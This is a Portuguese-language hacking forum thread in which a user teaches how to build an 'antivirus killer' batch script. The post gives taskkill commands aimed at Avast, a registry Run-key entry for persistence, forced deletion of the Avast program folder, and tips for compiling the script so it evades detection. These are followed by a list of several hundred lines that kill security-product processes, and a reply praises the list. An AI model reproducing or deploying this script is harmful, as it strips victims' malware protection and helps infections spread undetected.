Criar Av Killers (desativen os AVs para ler, eles detectam a pagina rsrs)

Iniciado por Binsh#, 07 de Janeiro , 2010, 04:39:08 PM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Binsh#

AV-Kil é um Anti-Virus Killer.... matador de anti-virus..

ele simplesmente mata, trava, bloqueia, impede o funcionamento do anti-virus...

o anti virus é um software q esta sujeito a erros como qualquer outro...
o av-kill simplesmente provoca esses erros., falta de componentes, finalização de processos importantes...

Exemplos de agora em diante supostos com o Avast 4.8 PRO

Anti-virus de hj em dia estão cientes desse tipo de tecnica.. para proteger o OS e se protegerem...
impedindo a finalização de seus processos, com outros processos... embaralhando o alvo final...
ou
impedindo a exclusão de seus arquivos..

E ainda ja rastreiam funções responsaveis por esses efeitos em executaveis e outros tipos de aquivo...

claro... tudo esta sujeito a falhas... que bom!


Como finalizar um processo:
o classico para isso é o batch... (responsavel por arquivos de lote ou linhas de DOS mesmo)

taskkill

task (processos)
kill (finaliza)

agora adicionaremos + 2 parametros
/f finalização forçada
/im especifica  nome da imagendo processo, em portugues, serve para poder dizer o nome do processo

exemplo final:

taskkill /f /im ashwebsv.exe

comando para finalizar o serviço de proteção web do avast

ashwebsv - avast
ashwebsv - web lol
ashwebsv - service

salve isso num arquivo .bat
mas coloque
@echo off antes

@echo off
taskkill /f /im ashwebsv.exe

salve como .bat

SHAZAN!... Avast off... virus FD (full detect) funfando como o diabo gosta


WARNING!
AV-KILL DETECTED

é amiguinho.. tecnica veia....

mas se embaralharmos o codigo ?

mas como ?  .bat é em texto.. tsc tsc tsc.. batch é um linguagen de programação e pode ser compilado...(para .exe)


Quick Batch File Compiler

só com isso seu av-killer ja fica indetec (hj dia 06/1/10)....

mas vamus melhorar o codigo rsrs...

até agora temos

@echo off
taskkill /f /im ashwebsv.exe



vamus adicionar
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kill /t REG_SZ /d c:\windows\av-kill.exe /f


c:\windows\av-kill.bat altere como desejado ^^ (local onde o av-kill reside)

isso cria uma + uma linha boa

del /q /f C:\Arquiv~1\alwils~1\avast4\*.* > null


del - deletar
/f - forçar
null - obriga a continuação da execução mesmo q a exclusão n seja autorizada

final

move av-kill.exe C:\%windir%



agora + uma coisa... descubram o nome de varios processos e diretorios de anti virus populares e adaptem o codigo...


resultado

@ECHO OFF

REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run /v kill /f

REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v kill /t REG_SZ /d c:\windows\av-kill.exe /f
taskkill /f /im ashwebsv.exe

taskkill /f /im ashdisp.exe

taskkill /f /im ashmaisv.exe

taskkill /f /im ashserv.exe

taskkill /f /im ashwebsv.exe

taskkill /f /im aswupdsv.exe

del /Q /F C:\Arquiv~1\alwils~1\avast4\*.* > nul

move av-kill.exe C:\WINDOWS

exit



procurem processo..

aff nem sei pq eu me presto a instiga a curiosidade de vcs em procurarem isso.. ta  aki uma lista.. ja de um av-killer meu..



taskkill /f /im nod32kui.exe

taskkill /f /im nod32krn.exe

taskkill /f /im nod32.exe

taskkill /f /im kav.exe

taskkill /f /im kavmm.exe

taskkill /f /im avp.exe

taskkill /f /im avgemc.exe

taskkill /f /im avgcc.exe

taskkill /f /im avgamsvr.exe

taskkill /f /im avgupsvc.exe

taskkill /f /im avgw.exe

taskkill /f /im ashwebsv.exe

taskkill /f /im ashdisp.exe

taskkill /f /im ashmaisv.exe

taskkill /f /im ashserv.exe

taskkill /f /im ashwebsv.exe

taskkill /f /im aswupdsv.exe

taskkill /f /im ewidoctrl.exe

taskkill /f /im guard.exe

taskkill /f /im gcasdtserv.exe

taskkill /f /im msmpeng.exe

taskkill /f /im mcafee.exe

taskkill /f /im mghml.exe

taskkill /f /im msiexec.exe

taskkill /f /im outpost.exe

taskkill /f /im isafe.exe

taskkill /f /im minilog.exe

taskkill /f /im zonealarm.exe

taskkill /f /im zlclient.exe

taskkill /f /im updclient.exe

taskkill /f /im ccapp.exe

taskkill /f /im navw32.exe

taskkill /f /im norton.exe

taskkill /f /im navapsvc.exe

taskkill /f /im ccsetmgr.exe

taskkill /f /im cccproxy.exe

taskkill /f /im ccapp.exe

taskkill /f /im ccevtmgr.exe

taskkill /f /im npfmntor.exe

taskkill /f /im logexprt.exe

taskkill /f /im nisum.exe

taskkill /f /im issvc.exe

taskkill /f /im cpdclnt.exe

taskkill /f /im pavprsrv.exe

taskkill /f /im pavprot.exe

taskkill /f /im avengine.exe

taskkill /f /im apvxdwin.exe

taskkill /f /im webproxy.exe

taskkill /f /im avguard.exe

taskkill /f /im avgnt.exe

taskkill /f /im shed.exe

taskkill /f /im avsched32.exe

taskkill /f /im sccomm.exe

taskkill /f /im spiderml.exe

taskkill /f /im sgmain.exe

taskkill /f /im spywareguard.exe

taskkill /f /im kpf4gui.exe

taskkill /f /im kpf4ss.exe

taskkill /f /im mcdash.exe

taskkill /f /im mcdetect.exe

taskkill /f /im mcregwiz.exe

taskkill /f /im mcinfo.exe

taskkill /f /im mghtml.exe

taskkill /f /im oasclnt.exe

taskkill /f /im mpfagent.exe

taskkill /f /im mpfconsole.exe

taskkill /f /im mpfservice.exe

taskkill /f /im mpftray.exe

taskkill /f /im mpfwizard.exe

taskkill /f /im mvtx.exe

taskkill /f /im _avp32.exe

taskkill /f /im _avpcc.exe

taskkill /f /im _avpm.exe

taskkill /f /im ackwin32.exe

taskkill /f /im advxdwin.exe

taskkill /f /im agentsvr.exe

taskkill /f /im agv.exe

taskkill /f /im ahnsd.exe

taskkill /f /im alertsvc.exe

taskkill /f /im alogserv.exe

taskkill /f /im amon.exe

taskkill /f /im amon9x.exe

taskkill /f /im amonavp32.exe

taskkill /f /im anti -trojan.exe

taskkill /f /im antivir.exe

taskkill /f /im antivirus.exe

taskkill /f /im ants.exe

taskkill /f /im antssircam.exe

taskkill /f /im apimonitor.exe

taskkill /f /im aplica32.exe

taskkill /f /im apvxdwin.exe

taskkill /f /im atcon.exe

taskkill /f /im atguard.exe

taskkill /f /im ats.exe

taskkill /f /im atscan.exe

taskkill /f /im atupdater.exe

taskkill /f /im atwatch.exe

taskkill /f /im autodown.exe

taskkill /f /im autotrace.exe

taskkill /f /im autoupdate.exe

taskkill /f /im avconsol.exe

taskkill /f /im ave32.exe

taskkill /f /im avgcc32.exe

taskkill /f /im avgctrl.exe

taskkill /f /im avgserv.exe

taskkill /f /im avgserv9.exe

taskkill /f /im avgserv9schedapp.exe

taskkill /f /im avgw.exe

taskkill /f /im avkpop.exe

taskkill /f /im avkserv.exe

taskkill /f /im avkservice.exe

taskkill /f /im avkwcl9.exe

taskkill /f /im avkwctl9.exe

taskkill /f /im avnt.exe

taskkill /f /im avp.exe

taskkill /f /im avp32.exe

taskkill /f /im avpcc.exe

taskkill /f /im AVPCC Service.exe

taskkill /f /im avpccavpm.exe

taskkill /f /im avpdos32.exe

taskkill /f /im avpexec.exe

taskkill /f /im avpinst.exe

taskkill /f /im avpm.exe

taskkill /f /im avpmonitor.exe

taskkill /f /im avptc.exe

taskkill /f /im avptc32.exe

taskkill /f /im avpupd.exe

taskkill /f /im avpupdates.exe

taskkill /f /im avrescue.exe

taskkill /f /im avsched32.exe

taskkill /f /im avsynmgr.exe

taskkill /f /im avwin95.exe

taskkill /f /im avwinnt.exe

taskkill /f /im avwupd32.exe

taskkill /f /im avxgui.exe

taskkill /f /im avxinit.exe

taskkill /f /im avxlive.exe

taskkill /f /im avxmonitor9x.exe

taskkill /f /im avxmonitornt.exe

taskkill /f /im avxnews.exe

taskkill /f /im avxquar.exe

taskkill /f /im avxsch.exe

taskkill /f /im avxw.exe

taskkill /f /im BACKLOG.exe

taskkill /f /im bd_professional.exe

taskkill /f /im bidef.exe

taskkill /f /im bidserver.exe

taskkill /f /im bipcp.exe

taskkill /f /im bisp.exe

taskkill /f /im blackd.exe

taskkill /f /im blackice.exe

taskkill /f /im blackiceblackd.exe

taskkill /f /im BootWarn.exe

taskkill /f /im borg2.exe

taskkill /f /im bs120.exe

taskkill /f /im bullguard.exe

taskkill /f /im ccApp.exe

taskkill /f /im ccevtmgr.exe

taskkill /f /im ccIMScan.exe

taskkill /f /im ccPwdSrc.exe

taskkill /f /im ccpxysvc.exe

taskkill /f /im ccSetMgr.exe

taskkill /f /im cdp.exe

taskkill /f /im cfiadmin.exe

taskkill /f /im cfiaudit.exe

taskkill /f /im cfinet.exe

taskkill /f /im cfinet32.exe

taskkill /f /im claw95.exe

taskkill /f /im claw95cf.exe

taskkill /f /im clean.exe

taskkill /f /im cleaner.exe

taskkill /f /im cleaner3.exe

taskkill /f /im cleanpc.exe

taskkill /f /im cmgrdian.exe

taskkill /f /im cmon016.exe

taskkill /f /im codered.exe

taskkill /f /im connectionmonitor.exe

taskkill /f /im conseal.exe

taskkill /f /im cpd.exe

taskkill /f /im cpf9x206.exe

taskkill /f /im ctrl.exe

taskkill /f /im defalert.exe

taskkill /f /im defence.exe

taskkill /f /im defense.exe

taskkill /f /im defscangui.exe

taskkill /f /im defwatch.exe

taskkill /f /im deputy.exe

taskkill /f /im doors.exe

taskkill /f /im dpf.exe

taskkill /f /im drwatson.exe

taskkill /f /im drweb32.exe

taskkill /f /im dvp95.exe

taskkill /f /im dvp95_0.exe

taskkill /f /im ecengine.exe

taskkill /f /im edisk.exe

taskkill /f /im efpeadm.exe

taskkill /f /im esafe.exe

taskkill /f /im escanh95.exe

taskkill /f /im escanhnt.exe

taskkill /f /im escanv95.exe

taskkill /f /im espwatch.exe

taskkill /f /im etrustcipe.exe

taskkill /f /im evpn.exe

taskkill /f /im exantivirus -cnet.exe

taskkill /f /im fameh32.exe

taskkill /f /im fast.exe

taskkill /f /im fch32.exe

taskkill /f /im fih32.exe

taskkill /f /im findviru.exe

taskkill /f /im firewall.exe

taskkill /f /im fix-it.exe

taskkill /f /im flowprotector.exe

taskkill /f /im fnrb32.exe

taskkill /f /im fp -win.exe

taskkill /f /im fp -win_trial.exe

taskkill /f /im fprot.exe

taskkill /f /im frw.exe

taskkill /f /im fsaa.exe

taskkill /f /im fsav32.exe

taskkill /f /im fsav95.exe

taskkill /f /im fsave32.exe

taskkill /f /im fsgk32.exe

taskkill /f /im fsm32.exe

taskkill /f /im fsma32.exe

taskkill /f /im fsmb32.exe

taskkill /f /im fwenc.exe

taskkill /f /im gbmenu.exe

taskkill /f /im gbpoll.exe

taskkill /f /im gedit.exe

taskkill /f /im generics.exe

taskkill /f /im grief3878.exe

taskkill /f /im guard.exe

taskkill /f /im guarddog.exe

taskkill /f /im HackerEliminator.exe

taskkill /f /im iamapp.exe

taskkill /f /im iamserv.exe

taskkill /f /im iamstats.exe

taskkill /f /im ibmasn.exe

taskkill /f /im ibmavsp.exe

taskkill /f /im icload95.exe

taskkill /f /im icloadnt.exe

taskkill /f /im icmon.exe

taskkill /f /im icsupp95.exe

taskkill /f /im icsuppnt.exe

taskkill /f /im iface.exe

taskkill /f /im ifw2000.exe

taskkill /f /im inoculateit.exe

taskkill /f /im iomon98.exe

taskkill /f /im iparmor.exe

taskkill /f /im iris.exe

taskkill /f /im isrv95.exe

taskkill /f /im jammer.exe

taskkill /f /im jedi.exe

taskkill /f /im kavpf.exe

taskkill /f /im ldnetmon.exe

taskkill /f /im ldpromenu.exe

taskkill /f /im ldscan.exe

taskkill /f /im localnet.exe

taskkill /f /im lockdown.exe

taskkill /f /im lookout.exe

taskkill /f /im luall.exe

taskkill /f /im lucomserver.exe

taskkill /f /im luspt.exe

taskkill /f /im mcafee.exe

taskkill /f /im mcagent.exe

taskkill /f /im mcmnhdlr.exe

taskkill /f /im mcshield.exe

taskkill /f /im mcshieldvvstat.exe

taskkill /f /im mctool.exe

taskkill /f /im mcupdate.exe

taskkill /f /im mcvsrte.exe

taskkill /f /im mcvsshld.exe

taskkill /f /im mgavrtcl.exe

taskkill /f /im mgavrte.exe

taskkill /f /im mghtml.exe

taskkill /f /im mgui.exe

taskkill /f /im minilog.exe

taskkill /f /im mon.exe

taskkill /f /im monitor.exe

taskkill /f /im monsys32.exe

taskkill /f /im monsysnt.exe

taskkill /f /im moolive.exe

taskkill /f /im mpfservice.exe

taskkill /f /im mpftray.exe

taskkill /f /im mrflux.exe

taskkill /f /im msinfo32.exe

taskkill /f /im mwatch.exe

taskkill /f /im mxtask.exe

taskkill /f /im n32scanw.exe

taskkill /f /im nav.exe

taskkill /f /im NAV DefAlert.exe

taskkill /f /im nav32.exe

taskkill /f /im navalert.exe

taskkill /f /im navap.exe

taskkill /f /im navapsvc.exe

taskkill /f /im NAVAPW32.exe

taskkill /f /im navauto -protect.exe

taskkill /f /im navdx.exe

taskkill /f /im navengnavex15.exe

taskkill /f /im navlu32.exe

taskkill /f /im navnt.exe

taskkill /f /im navrunr.exe

taskkill /f /im navstub.exe

taskkill /f /im navw32.exe

taskkill /f /im Navwnt.exe

taskkill /f /im nc2000.exe

taskkill /f /im ndd32.exe

taskkill /f /im neomonitor.exe

taskkill /f /im neowatchlog.exe

taskkill /f /im net2000.exe

taskkill /f /im netarmor.exe

taskkill /f /im netcommando.exe

taskkill /f /im netinfo.exe

taskkill /f /im netmon.exe

taskkill /f /im netpro.exe

taskkill /f /im netprotect.exe

taskkill /f /im netscanpro.exe

taskkill /f /im netspyhunter -1.2.exe

taskkill /f /im netstat.exe

taskkill /f /im netutils.exe

taskkill /f /im netutils].exe

taskkill /f /im nimda.exe

taskkill /f /im nisserv.exe

taskkill /f /im nisum.exe

taskkill /f /im nisumnisservnisum.exe

taskkill /f /im nmain.exe

taskkill /f /im nod32.exe

taskkill /f /im norman.exe

taskkill /f /im norman_32.exe

taskkill /f /im norman_av.exe

taskkill /f /im norman32.exe

taskkill /f /im normanav.exe

taskkill /f /im normist.exe

taskkill /f /im norton.exe

taskkill /f /im Norton Auto-Protect.exe

taskkill /f /im norton_av.exe

taskkill /f /im nortonav.exe

taskkill /f /im notstart.exe

taskkill /f /im npfmessenger.exe

taskkill /f /im npfw.exe

taskkill /f /im npfw32.exe

taskkill /f /im nprotect.exe

taskkill /f /im npscheck.exe

taskkill /f /im npssvc.exe

taskkill /f /im nresq32.exe

taskkill /f /im nsched32.exe

taskkill /f /im nschednt.exe

taskkill /f /im nsplugin.exe

taskkill /f /im ntrtscan.exe

taskkill /f /im ntvdm.exe

taskkill /f /im ntxconfig.exe

taskkill /f /im nui.exe

taskkill /f /im nupgrade.exe

taskkill /f /im nvarch16.exe

taskkill /f /im nvc95.exe

taskkill /f /im nvsvc32.exe

taskkill /f /im nwservice.exe

taskkill /f /im nwtool16.exe

taskkill /f /im offguard.exe

taskkill /f /im OPScan.exe

taskkill /f /im ostronet.exe

taskkill /f /im outpost.exe

taskkill /f /im padmin.exe

taskkill /f /im panda.exe

taskkill /f /im pandaav.exe

taskkill /f /im panixk.exe

taskkill /f /im pav.exe

taskkill /f /im pavcl.exe

taskkill /f /im pavproxy.exe

taskkill /f /im pavsched.exe

taskkill /f /im pavw.exe

taskkill /f /im pc -cillan.exe

taskkill /f /im pc -cillin.exe

taskkill /f /im pccclient.exe

taskkill /f /im pccguide.exe

taskkill /f /im pcciomon.exe

taskkill /f /im pccntmon.exe

taskkill /f /im pccwin97.exe

taskkill /f /im pccwin98.exe

taskkill /f /im pcfwallicon.exe

taskkill /f /im pcscan.exe

taskkill /f /im periscope.exe

taskkill /f /im persfw.exe

taskkill /f /im pf2.exe

taskkill /f /im pfwadmin.exe

taskkill /f /im pingscan.exe

taskkill /f /im platin.exe

taskkill /f /im pop3trap.exe

taskkill /f /im poproxy.exe

taskkill /f /im portdetective.exe

taskkill /f /im portmonitor.exe

taskkill /f /im ppinupdt.exe

taskkill /f /im pptbc.exe

taskkill /f /im ppvstop.exe

taskkill /f /im processmonitor.exe

taskkill /f /im procexplorerv10#.exe

taskkill /f /im programauditor.exe

taskkill /f /im proport.exe

taskkill /f /im protectx.exe

taskkill /f /im pspf.exe

taskkill /f /im purge.exe

taskkill /f /im pview95.exe

taskkill /f /im pw32.exe

taskkill /f /im qconsole.exe

taskkill /f /im rav.exe

taskkill /f /im rav7.exe

taskkill /f /im rav7win.exe

taskkill /f /im realmon.exe

taskkill /f /im regrun2.exe

taskkill /f /im rescue.exe

taskkill /f /im rrguard.exe

taskkill /f /im rshell.exe

taskkill /f /im rtvscn95.exe

taskkill /f /im rulaunch.exe

taskkill /f /im safeweb.exe

taskkill /f /im SAVscan.exe

taskkill /f /im sbserv.exe

taskkill /f /im SBservice.exe

taskkill /f /im scan.exe

taskkill /f /im scan32.exe

taskkill /f /im scan95.exe

taskkill /f /im scanpm.exe

taskkill /f /im scrscan.exe

taskkill /f /im sd.exe

taskkill /f /im SENS.exe

taskkill /f /im serv95.exe

taskkill /f /im sfc.exe

taskkill /f /im sh.exe

taskkill /f /im sharedaccess.exe

taskkill /f /im shn.exe

taskkill /f /im smc.exe

taskkill /f /im sofi.exe

taskkill /f /im sophos.exe

taskkill /f /im sophos_av.exe

taskkill /f /im sophosav.exe

taskkill /f /im spf.exe

taskkill /f /im sphinx.exe

taskkill /f /im spy.exe

taskkill /f /im spygate.exe

taskkill /f /im spyx.exe

taskkill /f /im spyxx.exe

taskkill /f /im srwatch.exe

taskkill /f /im ss3edit.exe

taskkill /f /im st2.exe

taskkill /f /im supftrl.exe

taskkill /f /im supp95.exe

taskkill /f /im supporter5.exe

taskkill /f /im sweep95.exe

taskkill /f /im sweepnet.exe

taskkill /f /im sweepsrv.sys.exe

taskkill /f /im sweepsrv.sysvshwin32.exe

taskkill /f /im swnetsup.exe

taskkill /f /im symantec.exe

taskkill /f /im Symantec Core LC.exe

taskkill /f /im symlcsvc.exe

taskkill /f /im symproxysvc.exe

taskkill /f /im symtray.exe

taskkill /f /im sysedit.exe

taskkill /f /im taskmon.exe

taskkill /f /im taumon.exe

taskkill /f /im tauscan.exe

taskkill /f /im tbscan.exe

taskkill /f /im tcm.exe

taskkill /f /im tctca.exe

taskkill /f /im tds -3.exe

taskkill /f /im tds2 -98.exe

taskkill /f /im tds2 -nt.exe

taskkill /f /im tfak.exe

taskkill /f /im tfak5.exe

taskkill /f /im tgbob.exe

taskkill /f /im trendmicro.exe

taskkill /f /im trjscan.exe

taskkill /f /im trojantrap3.exe

taskkill /f /im TrueVector.exe

taskkill /f /im undoboot.exe

taskkill /f /im update.exe

taskkill /f /im vbcmserv.exe

taskkill /f /im vbcons.exe

taskkill /f /im vbust.exe

taskkill /f /im vbwin9x.exe

taskkill /f /im vbwinntw.exe

taskkill /f /im vccmserv.exe

taskkill /f /im vcontrol.exe

taskkill /f /im vet32.exe

taskkill /f /im vet95.exe

taskkill /f /im vettray.exe

taskkill /f /im vir -help.exe

taskkill /f /im virus.exe

taskkill /f /im virusmdpersonalfirewall.exe

taskkill /f /im vnlan300.exe

taskkill /f /im vnpc3000.exe

taskkill /f /im vpc32.exe

taskkill /f /im vpfw30s.exe

taskkill /f /im vptray.exe

taskkill /f /im vscan40.exe

taskkill /f /im vsched.exe

taskkill /f /im vsecomr.exe

taskkill /f /im vshwin32.exe

taskkill /f /im vshwin32vbcmserv.exe

taskkill /f /im vsmain.exe

taskkill /f /im vsmon.exe

taskkill /f /im vsstat.exe

taskkill /f /im vswin9xe.exe

taskkill /f /im vswinntse.exe

taskkill /f /im w9x.exe

taskkill /f /im watchdog.exe

taskkill /f /im webscanx.exe

taskkill /f /im webtrap.exe

taskkill /f /im wfindv32.exe

taskkill /f /im wgfe95.exe

taskkill /f /im whoswatchingme.exe

taskkill /f /im wimmun32.exe

taskkill /f /im winrecon.exe

taskkill /f /im winroute.exe

taskkill /f /im winsfcm.exe

taskkill /f /im wnt.exe

taskkill /f /im wqkmm3878.exe

taskkill /f /im wradmin.exe

taskkill /f /im wrctrl.exe

taskkill /f /im wsbgate.exe

taskkill /f /im wyvernworksfirewall.exe

taskkill /f /im zapro.exe

taskkill /f /im zatutor.exe

taskkill /f /im zauinst.exe

taskkill /f /im zonealarm.exe


KEst

Nussa enome sua lista de processo imensa mesmo.
Deve ter sido um dia trabalhoso.
Mas ai cara, só não curte a ilusão a batch script ser linguagem de programação.
^^
Sem isso está ótimo!


by KEst

Campanha Converta-se a Gnu is Not Unix/Linux